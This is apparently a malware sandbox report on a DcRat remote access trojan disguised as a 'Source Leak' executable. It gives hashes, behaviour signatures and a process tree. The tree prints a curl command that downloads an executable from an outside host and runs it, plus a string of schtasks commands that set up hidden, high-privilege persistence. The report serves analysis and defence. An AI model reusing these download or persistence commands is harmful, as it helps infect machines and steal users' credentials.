Overview

overview

10

Static

static

3

Source Lea...dup.js

windows7-x64

3

Source Lea...dup.js

windows10-2004-x64

3

Source Lea...ce.exe

windows7-x64

1

Source Lea...ce.exe

windows10-2004-x64

8

Source Lea...ce.exe

windows7-x64

1

Source Lea...ce.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 18:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Source Leak/Release/Source.exe

  • Size

    1.2MB

  • MD5

    6179f45e49ae7257c1fb5859dc119f73

  • SHA1

    14b8a63e92e4d9254a3949f841631b96f5eaa590

  • SHA256

    7dc826deb7225c544091b7a33f6e9093617941d90fba7c5b5057ff97e231270f

  • SHA512

    6f492fa5a1c7ba28c269355f80e316db05186ffd9ed28c72b1ce911cb8f46a10049fcfd09008ee99996194f4d154eb46e8b7af98c31db98a4a3690397a46b519

  • SSDEEP

    24576:CoJOLUTJcMfM2kO9shrYgTnwxznA1sUo1sUa2hZU6EmC3Fp39zZF35:7BnLUDUZi6EZFbVb

Score
10/10
dcratdiscoveryinfostealerratspywarestealer

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Source Leak\Release\Source.exe
    "C:\Users\Admin\AppData\Local\Temp\Source Leak\Release\Source.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1796
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:2192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:636
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2304
          • C:\Windows\system32\curl.exe
            curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe
            3⤵
            • Downloads MZ/PE file
            • Drops file in Windows directory
            PID:2580
        • C:\Windows\Speech\physmeme.exe
          "C:\Windows\Speech\physmeme.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe"
            3⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\ESD\EOO029hu24.bat" "
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3584
              • C:\ESD\Winver.exe
                "C:\ESD/Winver.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:548
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SWDkSOYgMA.bat"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4080
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    7⤵
                      PID:3776
                    • C:\Windows\system32\PING.EXE
                      ping -n 10 localhost
                      7⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:2160
                    • C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe
                      "C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3772
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:5080
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1800
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:760
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\ESD\SppExtComObj.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4396
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\ESD\SppExtComObj.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:5004
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\ESD\SppExtComObj.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1552
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Cookies\upfc.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4316
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\upfc.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4300
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Cookies\upfc.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2040
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:5108
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4748
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\upfc.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1604
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\ESD\RuntimeBroker.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2224
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2268
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1320
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\ESD\Winver.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4896
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1540
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 9 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1308

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ESD\EOO029hu24.bat
          Filesize

          61B

          MD5

          33c54a5f80394595d7f9f5bf2374f68c

          SHA1

          e515abb832132011a48661843ca2cb85ac7b7296

          SHA256

          97ec10319ebe1f05ac4f58bf8619aad0e0af8bcb0f11e8f44a73cd80fc125d2d

          SHA512

          8203808771aac07a702e986204fef3a3c5eb869f4863423b86b8fbb449f5a17700c459e96ec06958bdc17c48825380592aed90a93444e6d30027f3c1002e67bc

          Download Submit

        • C:\ESD\Winver.exe
          Filesize

          1.8MB

          MD5

          b5c4fa68d74ab47092a46241d6b10a16

          SHA1

          e754f10c51933c1ef98782fbf695e8f21198fe7e

          SHA256

          20e9dafaa42a6b6122ecc150622cf8aabe7a324527df144561de5ba0b486ab2a

          SHA512

          3ab67cb936cab9eb89bb8275309cbc5f56d7f03e554b5cc7bd54305c282b6e8a0feb4af8c1ebc7073d63c371444751c522b030748b4d57c28a768fd6cfdb5293

          Download Submit

        • C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe
          Filesize

          202B

          MD5

          4652fb55e060252dacdca19aee6266b0

          SHA1

          7711f923873149629b869217eea3b9e7b53a37d2

          SHA256

          071d6610f34bb0b1e2f6077550a40faf08475865b2863f3340f44f82fc009c74

          SHA512

          2f73b677f27eb83ec54ecf6c75701e01ae69c8173ea6e081aed443ec19e6f8326de0a4dcb3c808c321f74f1c1916e5a2ecaffed0774fe29ba3889e593bb1515c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SWDkSOYgMA.bat
          Filesize

          186B

          MD5

          6f34cb27d7bca26434e0d57d5f87b4b8

          SHA1

          cb588a7fa3b1feddd2bd0971d366644822584708

          SHA256

          62f27d99a804faf7a518d07684e9fd79e8b3504d101c4cb1722377b2e0237217

          SHA512

          190a9e8f81c6605545955a5acc181e1e877ee60044c95f951da1abcd090ce7206e6a4de76b920ad35416b2bdb914c98a24d58acf44019e97426f3e225b63e06c

          Download Submit

        • C:\Windows\Speech\physmeme.exe
          Filesize

          2.1MB

          MD5

          1d6941fbe47aa24e563eaad080f6d13a

          SHA1

          438d9a13439a4bd5939f0dc7d5a8a252e802236a

          SHA256

          ca3ef84162bcbf7d8ba6fbe39ab1b64ac743291c967005ac739f8e6baee91e32

          SHA512

          c3949ebd681c06ea0b62790d517ace9ae1531acb5bf9d05a766ac575599a17bdaeda889f599092b61fb34312bcbd5d8cda0193f89a2627af2019b27302b70f7e

          Download Submit

        • memory/548-15-0x0000000000960000-0x0000000000B32000-memory.dmp

          Filesize

          1.8MB

          Download

        • memory/548-17-0x0000000002C40000-0x0000000002C4E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/548-19-0x0000000002C80000-0x0000000002C9C000-memory.dmp

          Filesize

          112KB

          Download

        • memory/548-20-0x0000000002CF0000-0x0000000002D40000-memory.dmp

          Filesize

          320KB

          Download

        • memory/548-22-0x0000000002CA0000-0x0000000002CB8000-memory.dmp

          Filesize

          96KB

          Download